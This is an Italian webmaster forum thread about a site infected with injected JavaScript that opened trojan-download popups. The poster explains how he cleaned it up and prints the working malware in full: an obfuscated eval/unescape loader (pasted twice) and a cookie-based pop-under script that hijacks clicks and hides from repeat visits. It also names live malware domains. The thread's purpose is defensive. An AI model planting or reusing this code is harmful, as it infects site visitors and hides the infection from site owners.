• M
    User Newbie

    Problema con Autolink (faj4ehght.com)

    Salve, un saluto a tutto il forum GT.
    Ragazzi, vi scrivo perchè ho un problema, che malgrado le conoscenze non riesco a risolvere.
    In uno dei miei siti web, all'apertura della home page, si apre atomaticamente un link che porta a scaricare dei trojan, il link in questione è questo: faj4ehght.com (per favore, è mio dovere avvisarvi che all'apertura del link citato due trojan proveranno a scaricarsi sul vostro pc, quindi meglio non entrarci)

    Sto smanettando da qualche settimana e non riesco a cavarne piede. Questo succede solo sul portale, che adesso è stata messo offline, mentre nel forum, Vbulletin, questo problema non accade.

    Sapreste darmi un consiglio per provare ad eliminarlo?
    Leggendo su qualche altro sito non sono l'unico ad avere questo problema, però non c'è un qualcosa sulla sua risoluzione in merito.

    Rimango in attesa di un vostro consiglio, parere o qualsiasi spunto per risolvere questo problema. Sono in prima pagina sui motori di ricerca e questo problema mi sta facendo, in qualche modo, perdere posizioni, che ho arginato attraverso il robot, facendogli visitare delle pagine in redirect e bloccando l'accesso a quelle che sembrano essere infette.

    Attualmente il portale è offiline, ho lasciato aperto solo il forum, quindi, se qualcuno di voi volesse provare ad accedere per vedere di cosa si tratta, posso creare un account per accedere alla modalità offile dove si può riscontrare il problema.

    0
  • M
    User Newbie

    Allora ragazzi, il problema sono riuscito a risolverlo dando pò di attenzione ed effetuando test lato server. Cercherò di riassumere tutto il processo di analisi e bonifica, così che, ma speriamo di no, se qualcuno riscontrasse la stessa problematica potrà “facilmente” risolverla.

    Il problema è dato da un file javascript oscurato, che viene scritto attraverso un file .pl che ricerca alcuni script deboli sul dominio, in particolare nei domini che risiedono sulla stessa Shell Hosting, e che a loro volta presentano delle vulnerabilità.

    Il java script oscurato si chiama JS_AFIT.A, che viene richiamato sulle pagine del sito, o su alcuni file del server apache vulnerabili.
    Attraverso il brute force, viene modificato un file javascript vulnerabile contenuto sul vostro sito, inserendo il codice di richiamo al “malware” sul document.write

    Nel mio caso si è presentato in questa maniera:

    document.write('<script language="javascript">$="%63c%3d%225ngt%2568;i%252b+)%257bt%256dp%253dds.%2573%256ci%2563e%2528i,i%252b1)%253bst%25%22;cu%3d%22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4%3czub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dobuf4d%7bdKazpqf4)4zaxx%2fbuf4d%7bdKw%7b%7b%257F}qKzuyq4)46upbyu%257FqfK%257F%7byud6%2fbuf4d%7bdK`}yq%7ba`4)4#%2526$%2frazw`}%7bz4d%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3dobuf4}gKqzuvxqp4)4ruxgq%2f}r4%3c5c}zp%7bc:%7bdqfu42245zub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dfq`afz4}gKqzuvxqp%2f}r4%3c`mdq%7br4p%7bwayqz`:w%7b%7b%257F}q4))43g`f}zs3%3d}r4%3cp%7bwayqz`:w%7b%7b%257F}q:xqzs`|4))4$%3dop%7bwayqz`:w%7b%7b%257F}q4)46`qg`6%2f}gKqzuvxqp4)4p%7bwayqz`:w%7b%7b%257F}q4))43`qg`3%2fp%7bwayqz`:w%7b%7b%257F}q4)433%2fiqxgqo}gKqzuvxqp4)4`faq%2fifq`afz4}gKqzuvxqp%2firazw`}%7bz4d%7bdKsq`W%7b%7b%257F}q%3czuyq%3dobuf4w%7b%7b%257F}q4)46464?4p%7bwayqz`:w%7b%7b%257F}q%2fbuf4gqufw|4)46464?4zuyq4?46)6%2fbuf4gq`G`f4)4zaxx%2fbuf4%7brrgq`4)4$%2fbuf4qzp4)4$%2f}r4%3cw%7b%7b%257F}q:xqzs`|4*4$%3do%7brrgq`4)4w%7b%7b%257F}q:}zpql[r%3cgqufw|%3d%2f}r4%3c%7brrgq`45)49%25%3do%7brrgq`4?)4gqufw|:xqzs`|%2fqzp4)4w%7b%7b%257F}q:}zpql[r%3c6%2f684%7brrgq`%3d%2f}r4%3cqzp4))49%25%3doqzp4)4w%7b%7b%257F}q:xqzs`|%2figq`G`f4)4azqgwudq%3cw%7b%7b%257F}q:gavg`f}zs%3c%7brrgq`84qzp%3d%3d%2fiifq`afz%3cgq`G`f%3d%2firazw`}%7bz4d%7bdKgq`W%7b%7b%257F}q4%3czuyq84buxaq%3dop%7bwayqz`:w%7b%7b%257F}q4)4zuyq4?46)64?4qgwudq%3cbuxaq%3d4?46%2f4qld}fqg)Rf}pum8%27%259Pqw9!$4%2526%27.!-.!-4SY@%2f4du`|);%2f6%2firazw`}%7bz4g|%7bcKd%7bd%3c%3dobuf4d%7bdKczp4)46|``d.;;rvwyr}f:w%7by;ws}9v}z;}zpql:ws}+sf%7bv}z6%2fbuf4rquKczp4)46gwf%7bxxvufg)%258fqg}nuvxq)%258`%7b%7bxvuf)%258x%7bwu`}%7bz)%258yqzavuf)%258g`u`ag)%258p}fqw`%7bf}qg)$6%2fbuf4zqqpK%7bdqz4)4`faq%2f}r4%3cp%7bwayqz`:%7bzwx}w%257FKw%7bdm45)4zaxx%3dp%7bwayqz`:%7bzwx}w%257FKw%7bdm%3c%3d%2f}r4%3cp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm45)4zaxx%3dp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm%3c%3d%2f}r4%3cd%7bdKazpqf45)4zaxx%3do}r4%3c5d%7bdKazpqf:wx%7bgqp%3dzqqpK%7bdqz4)4ruxgq%2fi}r4%3czqqpK%7bdqz%3do}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3dobux4)4d%7bdKsq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq%3d%2f}r4%3cbux45)4zaxx%3doz%7bc4)4zqc4Pu`q%3c%3d%2fbux%25264)4zqc4Pu`q%3cbux%3d%2fa`w%27%25264)4Pu`q:A@W%3cz%7bc:sq`RaxxMquf%3c%3d84z%7bc:sq`Y%7bz`|%3c%3d84z%7bc:sq`Pu`q%3c%3d84z%7bc:sq`%255C%7bafg%3c%3d84z%7bc:sq`Y}za`qg%3c%3d84z%7bc:sq`Gqw%7bzpg%3c%3d%3d%2fa`w%25264)4Pu`q:A@W%3cbux%2526:sq`RaxxMquf%3c%3d84bux%2526:sq`Y%7bz`|%3c%3d84bux%2526:sq`Pu`q%3c%3d84bux%2526:sq`%255C%7bafg%3c%3d84bux%2526:sq`Y}za`qg%3c%3d84bux%2526:sq`Gqw%7bzpg%3c%3d%3d%2f}r4%3c4%3c4a`w%27%2526494a`w%25264%3d4;4%25$$$4(4d%7bdK`}yq%7ba`%3e%2522$%3dozqqpK%7bdqz4)4ruxgq%2fiiii}r4%3czqqpK%7bdqz%3doazpqf4)4c}zp%7bc:%7bdqz%3cd%7bdKczp846684rquKczp%3d%2fazpqf:vxaf%3c%3d%2fc}zp%7bc:r%7bwag%3c%3d%2f}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3doz%7bc4)4zqc4Pu`q%3c%3d%2fd%7bdKgq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq84z%7bc%3d%2fiiirazw`}%7bz4d%7bdK}z}`%3c%3dobuf4bqf4)4dufgqRx%7bu`%3czub}su`%7bf:uddBqfg}%7bz%3d%2fbuf4bqf%25264)4%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-!6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-,6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4Z@6%3d*)$4%3d22%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3[dqfu3%3d4))49%25%3d22%3czub}su`%7bf:uddZuyq45)43Zq`gwudq3%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3YG]Q3%3d4*49%25%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3GB%253%3d4*49%25%3d422%3cbqf4*)4%2520%3d%2f}r4%3cbqf%2526%3do}r4%3cp%7bwayqz`:x}z%257Fg%3dor%7bf4%3cbuf4})$%2f4}(p%7bwayqz`:x}z%257Fg:xqzs`|%2f4}??%3do}r4%3cp%7bwayqz`:x}z%257FgO}I:`ufsq`45)46Kvxuz%257F6%3dop%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F%2fp%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F4)4g|%7bcKd%7bd%2fiiiip%7bwayqz`:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz`:%7bzwx}w%257F%2fp%7bwayqz`:%7bzy%7bagqad4)4g|%7bcKd%7bd%2fid%7bdK}z}`%3c%3d%2fi(;gwf}d`*%22;ca%3d%22%2566%2575nc%2574%2569o%256e%2520dcs%2528ds%252ce%2573)%257bds%253dun%2565s%2563ap%22;de%3d%22M+}Sx-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:%2526950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;da%3d%22fqb0})-~ug0Qbbqi87|qe~%257F7%3c7%7brtfu7%3c7zsdxb7%3c7ytvyb7%3c7xufyv7%3c7wvhuc7%3c7vwfuc7%3c7uxwxd7%3c7tzu~y7%3c7s%7bud~7%3c7r||uf7%3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%257F7%22;dd%3d%22iSx%2522%3c}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950%25265##950%2522%2526M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209%22;db%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudT%22;ce%3d%22%2561%2572Co%2564e%2541t(%2530)^%2528%25270x0%2530%2527+es%2529%2529);}%257d%22;st%3d%22%2573%2574%253d%2522$%253dst%253bd%2563s%2528d%2561+%2564b%252b%2564c%252b%2564d%252bd%2565%252c%25310%2529;%2564%2577%2528%2573%2574)%253bs%2574%253d$%253b%2522;%22;op%3d%22%2524%253d%2522dw(dc%2573%2528c%2575,1%2534%2529);%2522;%22;dz%3d%22%2566u%256ecti%256fn%2520dw%2528%2574)%257bc%2561%253d%2527%252564o%252563%252575me%256e%252574%25252ewr%252569t%252565%252528%252522%2527;c%2565%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t%2525%25320la%256e%252567%2575%252561%252567%2565%25253d%25255c%25252%2532j%2561va%25257%2533%2563ri%252570t%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252f%2573c%2572i%2570%252574%25253e%2527;%2565%2576a%256c%2528un%2565sca%2570e(%2574))%257d;%22;cb%3d%22e%2528ds%2529;%2573t%253dt%256dp%253d%2527%2527;for(%2569%253d%2530;i%253cds.l%256%22;cz%3d%22%2566%2575%256ect%2569on%2520%2563z%2528cz)%257bret%2575rn%2520%2563a%252bc%2562+%2563c%252bcd+%2563e+%2563z;%257d;%22;dc%3d%22qi89;%25229+u|cu0d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vyb%3es%257F}7+fqb0iSx!%3c%22;cd%3d%223dst+%2553tr%2569n%2567.f%2572%256fmCh%2561rC%256f%2564e((%2574%256d%2570.%2563h%22;%69f%20%28d%6f%63um%65nt%2eco%6fk%69e.%69n%64ex%4ff%28%27vbu%6clet%69n%5f%6du%6cti%71u%6f%74%65%3d%27)%3d%3d-1%29%7bs%63%28%27vbull%65tin%5fmul%74iqu%6ft%65%3d%27,2,7%29;ev%61l(u%6e%65s%63%61%70e(%64z+%63z+o%70+st%29+%27d%77(%64z%2b%63z%28$%2b%73t)%29;%27)%7dels%65%7b$%3d%27%27};functio%6e sc%28c%6em,v%2ced)%7bva%72 ex%64%3dn%65%77 Da%74%65%28);%65x%64.se%74Dat%65%28exd%2ege%74%44%61te(%29+%65%64);%64oc%75%6dent%2ecoo%6bie%3d%63nm%2b %27%3d%27 +e%73%63ape%28v)+%27%3b%65xpi%72es%3d%27+exd.to%47M%54%53tr%69%6eg%28);%7d;";eval(unescape($));document.write($);</script>');
```  Era posto su un javascript di un partner site incluso in tutte el aree del mio portale, meno che nel forum.
 
Il codice apre un popup alla webpage che scarica automaticamente i due trojan, ed è impostato in maniera tale che se i cookies rimangono validati sul sito infetto venga visualizzato solo una volta, così da non insospettire il webmaster attraverso e-mail di avviso, o comunque far credere all&#8217;utente che si tratta di un caso isolato. Quando i cookies vengono eliminati dal browser o dal portale, il problema riappare.
 
Ecco il codice che agisce sui cookies:

    if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "advmaker_komap";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "LINK faj4ehght.com/cgi-bin/index.cgi?grobin";var fea_wnd = "scrollbars=›esizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links.target != "_blank"){document.links*.onclick_copy = document.links*.onclick;document.links*.onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}

      Procediamo entrando nella nella pagina infetta e attraverso la web developer toolbar andiamo sulla funzione INFORMATION e dal menù scegliamo la voce View Javascript.
   
  Si aprirà una pagina che mostrerà tutto il codice javascript contenuto nella pagina infetta. 
  A questo punto si presenteranno due codici, ovvero il codice del **document.write** e il codice **if (navigator.cookieEnabled)&#8230;..**

  **Nota:** il codice **if (navigator.cookieEnabled)&#8230;** Potrebbe non apparire se il popup malevolo è stato già visualizzato, e quindi è iniziata la sessione di registrazione dei cookies.
   
  A questo punto cerchiamo il file javascript che è stato compromesso con questo codice:

    document.write('<script language="javascript">$="%63c%3d%225ngt%2568;i%252b+)%257bt%256dp%253dds.%2573%256ci%2563e%2528i,i%252b1)%253bst%25%22;cu%3d%22(gwf}d4xuzsausq)6~ubugwf}d6*}r4%3czub}su%7bf:w%7b%7b%257F}qQzuvxqp%3dobuf4d%7bdKazpqf4)4zaxx%2fbuf4d%7bdKw%7b%7b%257F}qKzuyq4)46upbyu%257FqfK%257F%7byud6%2fbuf4d%7bdK}yq%7ba4)4#%2526$%2frazw}%7bz4d%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3dobuf4}gKqzuvxqp4)4ruxgq%2f}r4%3c5c}zp%7bc:%7bdqfu42245zub}su%7bf:w%7b%7b%257F}qQzuvxqp%3dfqafz4}gKqzuvxqp%2f}r4%3cmdq%7br4p%7bwayqz:w%7b%7b%257F}q4))43gf}zs3%3d}r4%3cp%7bwayqz:w%7b%7b%257F}q:xqzs|4))4$%3dop%7bwayqz:w%7b%7b%257F}q4)46qg6%2f}gKqzuvxqp4)4p%7bwayqz:w%7b%7b%257F}q4))43qg3%2fp%7bwayqz:w%7b%7b%257F}q4)433%2fiqxgqo}gKqzuvxqp4)4faq%2fifqafz4}gKqzuvxqp%2firazw}%7bz4d%7bdKsqW%7b%7b%257F}q%3czuyq%3dobuf4w%7b%7b%257F}q4)46464?4p%7bwayqz:w%7b%7b%257F}q%2fbuf4gqufw|4)46464?4zuyq4?46)6%2fbuf4gqGf4)4zaxx%2fbuf4%7brrgq4)4$%2fbuf4qzp4)4$%2f}r4%3cw%7b%7b%257F}q:xqzs|4*4$%3do%7brrgq4)4w%7b%7b%257F}q:}zpql[r%3cgqufw|%3d%2f}r4%3c%7brrgq45)49%25%3do%7brrgq4?)4gqufw|:xqzs|%2fqzp4)4w%7b%7b%257F}q:}zpql[r%3c6%2f684%7brrgq%3d%2f}r4%3cqzp4))49%25%3doqzp4)4w%7b%7b%257F}q:xqzs|%2figqGf4)4azqgwudq%3cw%7b%7b%257F}q:gavgf}zs%3c%7brrgq84qzp%3d%3d%2fiifqafz%3cgqGf%3d%2firazw}%7bz4d%7bdKgqW%7b%7b%257F}q4%3czuyq84buxaq%3dop%7bwayqz:w%7b%7b%257F}q4)4zuyq4?46)64?4qgwudq%3cbuxaq%3d4?46%2f4qld}fqg)Rf}pum8%27%259Pqw9!$4%2526%27.!-.!-4SY@%2f4du|);%2f6%2firazw}%7bz4g|%7bcKd%7bd%3c%3dobuf4d%7bdKczp4)46|``d.;;rvwyr}f:w%7by;ws}9v}z;}zpql:ws}+sf%7bv}z6%2fbuf4rquKczp4)46gwf%7bxxvufg)%258fqg}nuvxq)%258%7b%7bxvuf)%258x%7bwu}%7bz)%258yqzavuf)%258guag)%258p}fqw%7bf}qg)$6%2fbuf4zqqpK%7bdqz4)4faq%2f}r4%3cp%7bwayqz:%7bzwx}w%257FKw%7bdm45)4zaxx%3dp%7bwayqz:%7bzwx}w%257FKw%7bdm%3c%3d%2f}r4%3cp%7bwayqz:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm45)4zaxx%3dp%7bwayqz:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm%3c%3d%2f}r4%3cd%7bdKazpqf45)4zaxx%3do}r4%3c5d%7bdKazpqf:wx%7bgqp%3dzqqpK%7bdqz4)4ruxgq%2fi}r4%3czqqpK%7bdqz%3do}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3dobux4)4d%7bdKsqW%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq%3d%2f}r4%3cbux45)4zaxx%3doz%7bc4)4zqc4Puq%3c%3d%2fbux%25264)4zqc4Puq%3cbux%3d%2faw%27%25264)4Puq:A@W%3cz%7bc:sqRaxxMquf%3c%3d84z%7bc:sqY%7bz|%3c%3d84z%7bc:sqPuq%3c%3d84z%7bc:sq%255C%7bafg%3c%3d84z%7bc:sqY}zaqg%3c%3d84z%7bc:sqGqw%7bzpg%3c%3d%3d%2faw%25264)4Puq:A@W%3cbux%2526:sqRaxxMquf%3c%3d84bux%2526:sqY%7bz|%3c%3d84bux%2526:sqPuq%3c%3d84bux%2526:sq%255C%7bafg%3c%3d84bux%2526:sqY}zaqg%3c%3d84bux%2526:sqGqw%7bzpg%3c%3d%3d%2f}r4%3c4%3c4aw%27%2526494aw%25264%3d4;4%25$$$4(4d%7bdK}yq%7ba%3e%2522$%3dozqqpK%7bdqz4)4ruxgq%2fiiii}r4%3czqqpK%7bdqz%3doazpqf4)4c}zp%7bc:%7bdqz%3cd%7bdKczp846684rquKczp%3d%2fazpqf:vxaf%3c%3d%2fc}zp%7bc:r%7bwag%3c%3d%2f}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3doz%7bc4)4zqc4Puq%3c%3d%2fd%7bdKgqW%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq84z%7bc%3d%2fiiirazw}%7bz4d%7bdK}z}%3c%3dobuf4bqf4)4dufgqRx%7bu%3czub}su%7bf:uddBqfg}%7bz%3d%2fbuf4bqf%25264)4%3czub}su%7bf:agqfUsqz:}zpql[r%3c6C}zp%7bcg4-!6%3d*)$4hh4zub}su%7bf:agqfUsqz:}zpql[r%3c6C}zp%7bcg4-,6%3d*)$4hh4zub}su%7bf:agqfUsqz:}zpql[r%3c6C}zp%7bcg4Z@6%3d*)$4%3d22%3czub}su%7bf:agqfUsqz:}zpql[r%3c3[dqfu3%3d4))49%25%3d22%3czub}su%7bf:uddZuyq45)43Zqgwudq3%3d422%3czub}su%7bf:agqfUsqz:}zpql[r%3c3YG]Q3%3d449%25%3d422%3czub}su%7bf:agqfUsqz:}zpql[r%3c3GB%253%3d449%25%3d422%3cbqf4*)4%2520%3d%2f}r4%3cbqf%2526%3do}r4%3cp%7bwayqz:x}z%257Fg%3dor%7bf4%3cbuf4})$%2f4}(p%7bwayqz:x}z%257Fg:xqzs|%2f4}??%3do}r4%3cp%7bwayqz:x}z%257FgO}I:ufsq45)46Kvxuz%257F6%3dop%7bwayqz:x}z%257FgO}I:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz:x}z%257FgO}I:%7bzwx}w%257F%2fp%7bwayqz:x}z%257FgO}I:%7bzwx}w%257F4)4g|%7bcKd%7bd%2fiiiip%7bwayqz:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz:%7bzwx}w%257F%2fp%7bwayqz:%7bzy%7bagqad4)4g|%7bcKd%7bd%2fid%7bdK}z}%3c%3d%2fi(;gwf}d*%22;ca%3d%22%2566%2575nc%2574%2569o%256e%2520dcs%2528ds%252ce%2573)%257bds%253dun%2565s%2563ap%22;de%3d%22M+}Sx-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:%2526950%2522%279M+4-4%3ebu|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;da%3d%22fqb0})-~ug0Qbbqi87|qe~%257F7%3c7%7brtfu7%3c7zsdxb7%3c7ytvyb7%3c7xufyv7%3c7wvhuc7%3c7vwfuc7%3c7uxwxd7%3c7tzu~y7%3c7s%7bud~7%3c7r||uf7%3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%257F7%22;dd%3d%22iSx%2522%3c}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950%25265##950%2522%2526M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209%22;db%3d%22%3c77%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudT%22;ce%3d%22%2561%2572Co%2564e%2541t(%2530)^%2528%25270x0%2530%2527+es%2529%2529);}%257d%22;st%3d%22%2573%2574%253d%2522$%253dst%253bd%2563s%2528d%2561+%2564b%252b%2564c%252b%2564d%252bd%2565%252c%25310%2529;%2564%2577%2528%2573%2574)%253bs%2574%253d$%253b%2522;%22;op%3d%22%2524%253d%2522dw(dc%2573%2528c%2575,1%2534%2529);%2522;%22;dz%3d%22%2566u%256ecti%256fn%2520dw%2528%2574)%257bc%2561%253d%2527%252564o%252563%252575me%256e%252574%25252ewr%252569t%252565%252528%252522%2527;c%2565%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t%2525%25320la%256e%252567%2575%252561%252567%2565%25253d%25255c%25252%2532j%2561va%25257%2533%2563ri%252570t%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252f%2573c%2572i%2570%252574%25253e%2527;%2565%2576a%256c%2528un%2565sca%2570e(%2574))%257d;%22;cb%3d%22e%2528ds%2529;%2573t%253dt%256dp%253d%2527%2527;for(%2569%253d%2530;i%253cds.l%256%22;cz%3d%22%2566%2575%256ect%2569on%2520%2563z%2528cz)%257bret%2575rn%2520%2563a%252bc%2562+%2563c%252bcd+%2563e+%2563z;%257d;%22;dc%3d%22qi89;%25229+u|cu0d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vyb%3es%257F}7+fqb0iSx!%3c%22;cd%3d%223dst+%2553tr%2569n%2567.f%2572%256fmCh%2561rC%256f%2564e((%2574%256d%2570.%2563h%22;%69f%20%28d%6f%63um%65nt%2eco%6fk%69e.%69n%64ex%4ff%28%27vbu%6clet%69n%5f%6du%6cti%71u%6f%74%65%3d%27)%3d%3d-1%29%7bs%63%28%27vbull%65tin%5fmul%74iqu%6ft%65%3d%27,2,7%29;ev%61l(u%6e%65s%63%61%70e(%64z+%63z+o%70+st%29+%27d%77(%64z%2b%63z%28$%2b%73t)%29;%27)%7dels%65%7b$%3d%27%27};functio%6e sc%28c%6em,v%2ced)%7bva%72 ex%64%3dn%65%77 Da%74%65%28);%65x%64.se%74Dat%65%28exd%2ege%74%44%61te(%29+%65%64);%64oc%75%6dent%2ecoo%6bie%3d%63nm%2b %27%3d%27 +e%73%63ape%28v)+%27%3b%65xpi%72es%3d%27+exd.to%47M%54%53tr%69%6eg%28);%7d;";eval(unescape($));document.write($);</script>');

          

  **E se è stato un file del server ad essere infettato?**
    Il file del server che viene infettato ha la stessa linea di codice ma non usa i cookies, quindi il gestori del server avranno lo stesso problema su tutti i siti presenti nel server infettato e saranno, si spera, loro stessi a rimuoverli o comunque è bene inoltrare segnalazione del problema non appena questo viene riscontrato.
  
Spero di essere stato in qualche modo d'aiuto. Ringrazio l'amico nassim per avermi dato alcuni imput necessari a concentrare l'attenzione su alcuni aspetti che avevo trascurato e che mi hanno portato a risolvere il problema.
    0
  • C
    User Newbie

    Ciao, sono capitato in questa discussione in questa che dovrebbe essere per molti una giornata di festa perché ho un problema simile da un paio di giorni (niente festa per il momento).
    Ho un sito basato su md-pro su aruba (linux) che risulta compromesso da un codice molto simile (mi pare che la differenza sia solo che punta a bassamtwe.com anziché a faj4eghth.com) che non so come rimuovere dato che non compare nelle index.php.
    non sono riuscito a trovare altre info su js_afit.a... potrebbe essere js_afir.a?
    Grazie dell'attenzione.

    0
  • T
    ModSenior

    Ciao cb,

    Puoi provare a scaricare tutti gli script dal server, e usare un programma tipo dreamweaver per conrollare la presenza di quel codice nei file.
    Sicuramente il codice si trova su un file avente i permessi a 777.

    Per non far verificare nuovamente il problema, prova a controllare non siano presenti degli aggiornamenti per il cms, e togli i permessi di scrittura sui file, che non richiedono i permessi a 777.

    0
Effettua l'accesso per rispondere